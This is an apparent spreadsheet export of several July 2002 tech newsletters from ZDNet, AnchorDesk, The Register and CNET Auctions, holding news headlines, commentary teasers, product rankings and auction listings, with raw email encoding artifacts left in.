and\nrunning?  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Acer gloomy on tech\nrecovery  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] VoiceStream, AT&amp;T;\nWireless to hook up?  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Dell douses Lexmark\nspeculation  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Chip designer ARM\nlaunches China foray  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] **More Enterprise News**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n**Farber's Picks**  \n|  ![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL]  \n\nDan  \nFarber\n\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**Cyberterrorists don't care about your PC**  \nForget about viruses. America's real cybersecurity concerns are the\nnotoriously vulnerable computer systems that control our **power and water\nsupplies**. Robert Vamosi offers a few ideas about how to keep the\ninfrastructure safe.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**  \n  \n  \n  \n\n**Tech shores up Homeland Defense**  \nComputer security is becoming an increasingly critical part of President\nBush's proposal for a homeland defense department. When Bush formally proposed\nthe department last month, he never mentioned the Internet or cybersecurity.\nBut as Capitol Hill scrutinizes the proposal, politicians are fretting about\n**tech-savvy terrorists** \--and insisting any new agency must shield the U.S.\nfrom **electronic attacks** as well.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**  \n![]([URL]http://www.zdnet.com[/URL] **Bush security could\nget privacy czar**\n\n![]([URL]http://image.com.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**Novell's new identity**  \nNovell seems to understand where today's sweet spot is: providing enterprises\nwith the tools they need to manage and deliver **Web services** against the\nidentities of employees, partners, and customers. Novell, a leading Web\nservices company? It just may pull it off, says Tech Update's **Eric Knorr**.\nAre you looking for solutions to your **identity crisis**? Do you think Novell\ncan provide them?  \n![]([URL]http://www.zdnet.com[/URL] **Read the full\ncommentary**\n\n**ROI calculators don"t tell the whole TCO story**  \nIn response to David Berlind"s  **Dell's formula for ROI**, TCO consultant\n**Tom Rankin** warns that "99 percent of TCO tools do not look at the 'total'\nbut may look at whatever parameters suit the vendor to sell their\nproducts/services." His advice to clients: "Make sure they can write a check\nto the CFO after three months."  \n![]([URL]http://www.zdnet.com[/URL] **Read all his advice**\n\n![]([URL]http://image.com.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**Microsoft's Palladium: What the hell is it? (Here's what!)**  \nEverybody's talking about Palladium, Microsoft's new " **trustworthy\ncomputing** " architecture. But the details on what it is and how it will work\nare still extremely sketchy. My colleague, Anchordesk's **David Coursey** ,\nhas been putting the pieces together--and here's what he knows so far.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full\ncommentary**\n\n**Cell phone personality test**  \nWhether you're a total gear head or you like to keep things simple, take our\ncell phone personality test to find out which models suit you best.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**  \n![]([URL]http://www.zdnet.com[/URL] **David Berlind's Rx for\nmobile happiness**\n\n![]([URL]http://www.zdnet.com[/URL] me at\n**dan.farber@cnet.com**  \n  \n![]([URL]http://www.zdnet.com[/URL]**Back to top**  \n  \n  \n  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |  \n  \n**Also on Tech Update Today**  \n| ![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n**COMMENTARY**  \n![]([URL]http://www.zdnet.com[/URL] |  **Why didn't mobile platforms trip\nMicrosoft up?**  \n**Peter Judge** : In the late 90s, we thought the diversity of mobile\nplatforms would break Microsoft's monopoly. What went wrong?  \n  \n  \n---|---  \n**FEATURE**  \n![]([URL]http://www.zdnet.com[/URL] |  **Storage network infrastructure: 2002\nforecast**  \nComponents that interconnect storage and computing devices comprise the\nnetwork storage infrastructure. **Gartner** provide forecasts for its\nevolution from 2002 through 2006. How does your company implement its storage\nnetwork infrastructure?  \n  \n  \n---|---  \n**PREVIOUSLY ON TECH UPDATE TODAY**  \n![]([URL]http://www.zdnet.com[/URL] |  **Toshiba releases monster notebook**  \nThe 9.6-pound **Satellite 1955-S801** desktop replacement sports a 2.2GHz\nPentium 4 desktop processor and a 16-inch display.  \n  \n  \n---|---  \n![]([URL]http://www.zdnet.com[/URL]**Crucial Clicks\n--products worth looking at**  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n| **Networking**  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | **Find the\nright home network**  \nChoosing the right technology to match your networking needs is vital. Here's\nhelp in making the choice.  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL] reviews  \n![]([URL]http://www.zdnet.com[/URL] |  |\n![]([URL]http://www.zdnet.com[/URL] Popular\nProducts  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n**Networking**  \n![]([URL]http://www.zdnet.com[/URL]  \n**1**. Linksys EtherFast wireless AP  \n![]([URL]http://www.zdnet.com[/URL]  \n**2**. Linksys EtherFast router  \n![]([URL]http://www.zdnet.com[/URL]  \n**3**. Siemens SpeedStream router  \n![]([URL]http://www.zdnet.com[/URL]  \n**4**. Wireless 802.11B Router  \n![]([URL]http://www.zdnet.com[/URL]  \n**5**. NetGear HE102 802.11a wireless AP  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL]**More popular\nnetworking products**  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n  \n**Elsewhere on ZDNet**  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n**Veritas CEO Gary Bloom speaks out at Tech Update.\n\nCheck out these personal laser printer picks at ZDNet Reviews.\n\nSee how WAP works and how you should use it at Builder.com.\n\nNeed a new job? Find one today in ZDNet's Career Center.\n\nCIOs talk out about the future of IT at CNET News.com.**  \n  \n  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---|---|---|---|---  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n**Sign up for morefree newsletters from ZDNet**  \n![]([URL]http://www.zdnet.com[/URL]  \nThe e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com\n\nUnsubscribe |  Manage My Subscriptions | FAQ |  Advertise  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---|---|---|---|---|---|---|---  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---|---|---|---|---|---  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![ZDNet]([URL]http://www.zdnet.com[/URL] | Home\n|eBusiness | Security | Networking | Applications | Platforms | Hardware |\nContact us | ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n|\n\n  \n**Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a\nregistered service mark of CNET Networks, Inc.**\n\n|\n\n![]([URL]http://gserv.zdnet.com[/URL]  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>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www.zdnet.com http://www.zdnet.com http://image.com.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://image.com.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techupdate.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qqqqqqqqqq-zdnet@example.com\nFrom: AnchorDesk &lt;Online#3.19799.13-cLBKgHwZrJFX3dRR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 03:33:52 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 03:33:52 -0700 (PDT)</t>
  </si>
  <si>
    <t>AnchorDesk &lt;Online#3.19799.13-cLBKgHwZrJFX3dRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Next MS Office? Here's what I'd add--and delete [ANCHORDESK]</t>
  </si>
  <si>
    <t>![](3D"[URL]http://www.zdnet.com[/URL] | ![3D"Advertisement"](3D"[URL]http://www.zdnet.com[/URL]")      =20 |  | ![](3D"[URL]http://www.zdnet.com[/URL]   =  |  ![](3D"[URL]http://www.zdnet.com[/URL]   =20 ![](3D"[URL]http://www.zdnet.com[/URL]   =20 =20 **= Veritas CEO Gary Bloom speaks out at Tech Update.**   =20 =20 **= Check out these personal laser printer picks at ZDNet Reviews.**   ![](3D"[URL]http://www.zdnet.com[/URL]")   =20 =20 **= See how WAP works and how you should use it at Builder.com.**&lt;= br&gt; ![](3D"[URL]http://www.zdnet.com[/URL]")   =20 =20 **= Need a new job? Find one today in ZDNet's Career Center.**   = ![](3D"[URL]http://www.zdnet.com[/URL]")   =20 =20 **= CIOs talk out about the future of IT at CNET News.com.**   &lt;= img src=3D"[URL]http://www.zdnet.com[/URL]" width=3D"1" height=3D"6= "&gt;      | ![](3D"[URL]http://www.zdnet.com[/URL]   =   ---|---|---   =20  ![3D=](3D"[URL]http://www.zdnet.com[/URL]   ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") |  | ![3D""](3D"[URL]http://www.zdnet.com[/URL]   |  =20 ![](3D"[URL]http://www.zdnet.com[/URL]   THU JUL 11, 2002   = =20 ![](3D"[URL]http://www.zdnet.com[/URL]   =20  =20 =20  | ![3D"David](3D"[URL]http://www.zdnet.com[/URL]   ---   =20  **  David Coursey** | ![](3D"[URL]http://www.zdnet.com[/URL]   ---|---   ![](3D"[URL]http://www.zdnet.co[/URL]   ---   ![](3D"[URL]http://www.zdnet.com[/URL]   **Next MS Office? Here's what I'd= add--and delete**   ![](3D"[URL]http://www.zdnet.com[/URL]   The next version of Microsoft Office is due in the next yea= r or so. If you were product manager for the industry-standard office suite= , what would you add? What would you get rid of? What would you fix? Here's= my wish-list Top Ten. =20 =20 **NOTE: Why we're changing our publishing schedule=**   ![](3D"[URL]http://www.zdnet.com[/URL]   =20 **PLUS: AnchorDesk Radio: The changing geography o= f the Net**   ![](3D"[URL]http://www.zdnet.com[/URL]   ![3D""](3D"[URL]http://www.zdnet.com[/URL]   | ![3D""](3D"http:=)   | ![3D""](3D"http:=)   |  ![3D""](3D"[URL]http://www.zdnet.com[/URL]   ![3D"More](3D"[URL]http://www.zdnet.com[/URL]   =20 Feds focus on cybersecurity... Passport rival... Larger iMa= c LCD =20 =20 Want to stop spam? Here's how YOU do it =20 =20 =20 Tablet PCs: Very cool, but not for the masses =20 =20 Keep your PC's clock up to the second! Here's how ![](3D"[URL]http://www.zdnet.com[/URL]   | ![3D""](3D"http:=)         =20 =20  ![](3D"[URL]http://www.zdnet.com[/URL]**Crucial Clicks: More from ZDNet** =   ---   ![](3D"http://ww=)= | ![](3D"[URL]http://www.zdnet.com[/URL] | ![](3D"http=)=  | ![](3D"[URL]http://www.zdnet.com[/URL] | ![](3D"[URL]http://www.zdnet.com[/URL]   | **Laptops**   ![](3D"[URL]http://www.zdnet.co[/URL]   | ![3D""](3D"http:/=) | ![](=3D"[URL]http://www.zdnet.com[/URL]") | **2GHz to Go**   Intel's got two new 2GHz chips for portables. But if you have to ask how m= uch the jump from 1.8GHz to 2GHz will cost you, you probably can't afford i= t.   ---|---|---   ![](3D"[URL]http://www.zdne[/URL]   ![3D""](3D"[URL]http://techupdate.zdnet.com[/URL]")Read reviews&lt;= /tr&gt;  | ![](3D"[URL]http://www.zdnet.com[/URL] |  | Most Popular Products   ![3D""](=3D"[URL]http://www.zdnet.com[/URL]") | ![3D""](3D"[URL]http://www.zdnet.com[/URL] **Laptops**   ![3D""](3D"[URL]http://www.zdnet.com[/URL] **1**. Gateway 600XL   ![3D""](3D"[URL]http://www.zdnet.com[/URL]   **2**.= Dell Inspiron 2600 series   &lt;= img src=3D"[URL]http://www.zdnet.com[/URL]" width= =3D"1" height=3D"6" alt=3D"" border=3D"0" /&gt;   **3**. Dell Inspiron 8200 series   ![3D""](3D"h=)   **4**. Toshiba Satellite 2400-S251   ![=3D""](3D"[URL]http://www.zd[/URL]   **5**. Dell SmartStep 100N   ![3D""](3D"[URL]http://www.zdnet.com[/URL]   ![3D""](3D"[URL]http://techupdate.zdnet.com[/URL]**Mor= e popular laptops**   ![3D""](3D"[URL]http://www.zdnet.com[/URL]   | ![3D""](3D"[URL]http://www.zdnet.com[/URL]   ![](3D"[URL]http://www.zdnet.com[/URL]   ![](3D"[URL]http://www.zdnet.com[/URL]")   =20 =20 =20 =20 =20 ![3D"News](3D"[URL]http://www.zdnet.co[/URL]   | **  SYLVIA CARR** | ![](3D"[URL]http://www.zdnet.com[/URL]   ---|---   ![](3D"[URL]http://www.zdnet.co[/URL]   ---   ![3D"SYLVIA](3D"[URL]http://www.zdnet.com[/URL]   |   | ![](3D"[URL]http://www.zdnet.com[/URL]   **Feds= focus on cybersecurity... Passport rival... Larger iMac LCD**   Was= hington's finally realizing that cybersecurity is a key part of homeland de= fense. Plus: Sun's Liberty Alliance releases specs for a Microsoft Passport= rival. And expect an iMac with a 17-inch display at Macworld.   ---|---|---   =20   =20 =20 =20 =20 ![3D"News](3D"[URL]http://www.zdnet.co[/URL]   **  DAVID MORGENSTERN** | ![](3D"[URL]http://www.zdnet.com[/URL]   ---|---   ![](3D"[URL]http://www.zdnet.co[/URL]   ---   ![3D"DAVID](3D"[URL]http://www.zdnet.com[/URL]   |   | ![](3D"[URL]http://www.zdnet.com[/URL]   **Want= to stop spam? Here's how YOU do it**   Some of you love SpamNet, a = spam-killing app recommended by David Coursey. But others say it blocks too= many wanted e-mails, and offer their own tips and tricks for minimizing ju= nk e-mail. David rounds up your suggestions.   ---|---|---      =20 ![3D=](3D"[URL]http://www.zdnet.com[/URL]   =20 =20 =20 =20  **  DAVID BERLIND** | ![](3D"[URL]http://www.zdnet.com[/URL]   ---|---   ![](3D"[URL]http://www.zdnet.co[/URL]   ---   ![3D"DAVID](3D"[URL]http://www.zdnet.com[/URL]   |   | ![](3D"[URL]http://www.zdnet.com[/URL]   **Tablet PCs: Very cool, but not for the masses   ![](3D"[URL]http://www.zdnet.com[/URL]"=)   While tablet PCs offer cool features, like letting you scri= bble notes on the screen and swivel the display, David's not sure they're r= ight for everyone. Why? For starters, they're expensive and impractical for= traveling.   ---|---|---      =20 =20 =20 =20  **  PRESTON GRALLA** | ![](3D"[URL]http://www.zdnet.com[/URL]   ---|---   ![](3D"[URL]http://www.zdnet.co[/URL]   ---   ![3D"PRESTON](3D"[URL]http://www.zdnet.com[/URL]   |   | ![](3D"[URL]http://www.zdnet.com[/URL]   **Keep your PC's clock up to the second! Here's ho= w**   ![](3D"[URL]http://www.zdnet.com[/URL]   Your PC, powerful as it may be, is truly pitiful at keeping= track of time. But take heart. Preston has three, free downloads that sync= h your PC's clock with atomic-clock servers, guaranteeing you'll always hav= e the right time.   ---|---|---      =20 * * * **AnchorDesk Home** | **Previous Issue** ![](3D"[URL]http://www.zdnet.com[/URL]")   ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]")   | ![](3D"[URL]http://www.zdnet.com[/URL]")   ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]")   | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]"=) | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]")   | ![](3D"[URL]http://www.zdnet.com[/URL]")   ---|---|---|---|---|---|---   ![](3D"[URL]http://www.zdnet.com[/URL] | ![](3D"[URL]http://www.zdnet.com[/URL] | ![](3D"[URL]http://www.zdnet.com[/URL]"=) | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"h=)   **Sign up for morefree newsletter= s from ZDNet**   ![](3D"[URL]http://www.zdnet.com[/URL]")   The e-mail address for your subscription is qqqqqqqqqq-zdnet@zzzason.or= g =20 Unsubscribe |=20  Manage=20 My Subscriptions | FAQ |=20  Advertise   ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]"=) | ![](3D"[URL]http://www.zdnet.com[/URL] | ![](3D"[URL]http://www.zdnet.com[/URL]"=)   ---|---|---|---|---|---|---|---|---   ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]"=) | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]")   ---|---|---|---|---|---|---   ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![3D"ZDNet"](3D"[URL]http://www.zdnet.com[/URL] | Home |eBus= iness | Security | Networking | Applications = | Platforms | Hardware | Careers | ![](3D"[URL]http://www.zdnet.com[/URL]")   ---|---|---|---|---   ![](3D"[URL]http://www.zdnet.com[/URL]")   ---   |    **Copyright 2002 CNET Networks, Inc. All righ= ts reserved. ZDNet is a registered service mark of CNET Networks, Inc. &lt;= /font&gt;** | ![](3D"[URL]http://gserv.zdnet.com[/URL]      &lt;= tr&gt;  =      =20 ![](3D"[URL]http://clickthru.online.com[/URL]</t>
  </si>
  <si>
    <t>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 http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.co http://www.zdnet.com http://www.zdne http://techupdate.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zd http://www.zdnet.com http://techupdate.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.co http://www.zdnet.com http://www.zdnet.co http://www.zdnet.com http://www.zdnet.com http://www.zdnet.co http://www.zdnet.com http://www.zdnet.co http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.co http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.co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www.zdnet.com http://gserv.zdnet.com http://clickthru.online.com</t>
  </si>
  <si>
    <t>To: Reg Subscribers &lt;update@list.theregister.co.uk&gt;\nFrom: update@list.theregister.co.uk\nDate: Thu, 11 Jul 2002 03:00:02 +0100</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 03:00:02 +0100</t>
  </si>
  <si>
    <t>Reg Headlines Thursday July 11</t>
  </si>
  <si>
    <t>Today's Headlines from The Register\n-----------------------------------\n\n    To unsubscribe from this daily news update, see the instructions at\n    the end of this message.\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Software\n\n    Nokia claims Matsushita scalp for Series 60\n    We don't know the Finnish for Bill, but it's probably got more vowels than are useful in it...\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Microsoft stakes IP claims on OpenGL\n    From the We Told You So dept.\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Microsoft 'hoovers millions' from UK schools - MP \n    Blizzard descends on per seat licensing\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Last minute glitch knocks Win2k SP3 back to summer\n    Which in WA can mean many things...\n        [URL]http://www.theregister.co.uk[/URL]\n\n    MS to ship 64-bit .NET preview this month\n    Here's one we'll prepare later...\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Congressman vows Pigopolist legislation\n    Cleanup starts here\n        [URL]http://www.theregister.co.uk[/URL]\n\nPersonal Hardware\n\n    Dan Technology -  two concerned customers!\n    Bulging postbag. Kinda\n        [URL]http://www.theregister.co.uk[/URL]\n\nInternet\n\n    al-Qaeda poised to strike hard via the Internet\n    Red Alert Finger on the button\n\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Dutch ban virtual kinderporno\n    Fake images, real depravity\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Tiscali to shut second UK office. Or not\n    Shurely shome mishtake?\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Liverpool Council bans email on Wednesdays\n    But only internal, and no sanctions\n        [URL]http://www.theregister.co.uk[/URL]\n\n    IC24 launches daytime Net service\n    Remember them?\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Future for online content is bright \n    Screen Digest's screen dump\n        [URL]http://www.theregister.co.uk[/URL]\n\nNet Security\n\n    al-Qaeda poised to strike hard via the Internet\n    Red Alert Finger on the button\n\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Internet attacks on the rise\n    Surprise, surprise\n        [URL]http://www.theregister.co.uk[/URL]\n\nBusiness\n\n    Dell rules out Lexmark purchase\n    Interested in ink, not inking\n        [URL]http://www.theregister.co.uk[/URL]\n\nNetworks\n\n    Networking vendors eat their babies\n    Hey, it's a tough world out there\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Cisco to roll out airport WLAN hotspots in Europe\n    Claims 19 signed so far\n        [URL]http://www.theregister.co.uk[/URL]\n\nBroadband\n\n    Blueyonder and One.Tel in broadband promos\n    But not together\n        [URL]http://www.theregister.co.uk[/URL]\n\nAbout The Register\n\n    Hacker t-shirt launched in medium\n    Good news for any reader under 16 stone\n        [URL]http://www.theregister.co.uk[/URL]\n\n\n  --------ADVERTISEMENT------------------------------------------------\n\n  WIN tickets to a FORMULA ONE EUROPEAN GRAND PRIX!\n\n  Neverfail Group plc, business continuity software expert, sponsors Rubens\n  Barrichello driver of the Ferrari F1 team. Click here to find out more and\n  win tickets: [URL]www.neverfailgroup.com[/URL]\n\n  For every new customer that buys Neverfail(tm) products between the\n  July-September 2002 Grand Prix season, Neverfail Group plc will grant 2\n  tickets to a Grand Prix hospitality event with us next 2003 season.\n\n  ---------------------------------------------------------------------\nThe Register and its contents are copyright 2002 Situation Publishing.\nAll rights reserved.\n\n    Tel:     +44 (0)20 7499 2264.\n    Fax:     +44 (0)20 7493 5922.\n    E-Mail:  press.releases@theregister.co.uk\n\nTo unsubscribe from these daily updates, visit the following URL.  Make\nsure that you enter exactly the same e-mail address as you used to join\nthis service.\n\n    [URL]http://list.theregister.co.uk[/URL]</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-cnet-newsletters@example.com\nFrom: CNET Auctions &lt;Online#3.19725.55-A8YAgb1NX5rYkdRR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 02:25:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 02:25:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Auctions &lt;Online#3.19725.55-A8YAgb1NX5rYkdRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Intel 900MHz / 256MB PC-133 / 10X DVD / 20GB PC: Starting Bid $229</t>
  </si>
  <si>
    <t>![Auctions Weekly Newsletter]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n|  \n---  \n![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nAuctions All CNET T he Web  \n---  \n  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n**Site Map  \nÂ• Desktops  \nÂ• Notebooks  \nÂ• Components  \nÂ• Software  \nÂ• Input Devices  \nÂ• Networking  \nÂ• Handhelds  \nÂ• Printers  \nÂ• Memory  \nÂ• Storage  \nÂ• Electronics  \nÂ• Monitors  \nÂ• Modems  \nÂ• Scanners  \nÂ• Services  \nÂ• Digital Cameras  \nÂ• Accessories  \nÂ• Multimedia  \n**![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  |       **July 11th, 2002**  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]\n\n|\n\n|  \n\n**_ Intel 900MHz / 256MB PC-133 / 10X DVD / 20GB PC_  **  \n---  \n  \n\n  * **_Intel_ 900MHz Socket 370 Processor**\n  * **_Microstar_ PIII ATX Motherboard**\n  * **_Micron_ 256MB PC-133 SDRAM**\n  * **_Pioneer_ 10X DVD-ROM**\n  * **8MB 2X AGP Video**\n  * **64-Bit PCI Sound Card**\n  * **_WD/Seagate_ 20GB Ultra-66 HDD**\n\n|\n\n|  ![]([URL]http://auctions.cnet.com[/URL]  \n---  \n  \n**Bidding starts at $229 **  \n** _Don't miss out, place your bid now!_**  \n  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] ![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n  \n\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n---  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **LG 12x8x32\nCD-RW / 8x DVD-ROM Combo Drive**  \n  \nÂ• Starting Bid **$79**\n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **Lexmark\nZ-82 Printer/Copier/Flatbed All-in-One**  \n  \nÂ• Starting Bid **$1**   ![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **P4\nCeleron 1.7GHz/256MB PC-133  \nnVidia 32MB/16x DVD-ROM/20GB PC**  \n  \nÂ• Starting Bid **$399**  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **Gravis\nBlackhawk Digital Programmable Joystick**  \n  \nÂ• Starting Bid **$6.50**  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **Gateway\n15-inch TFT LCD Flat Panel Color Monitor**  \n  \nÂ• Starting Bid **$319**\n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  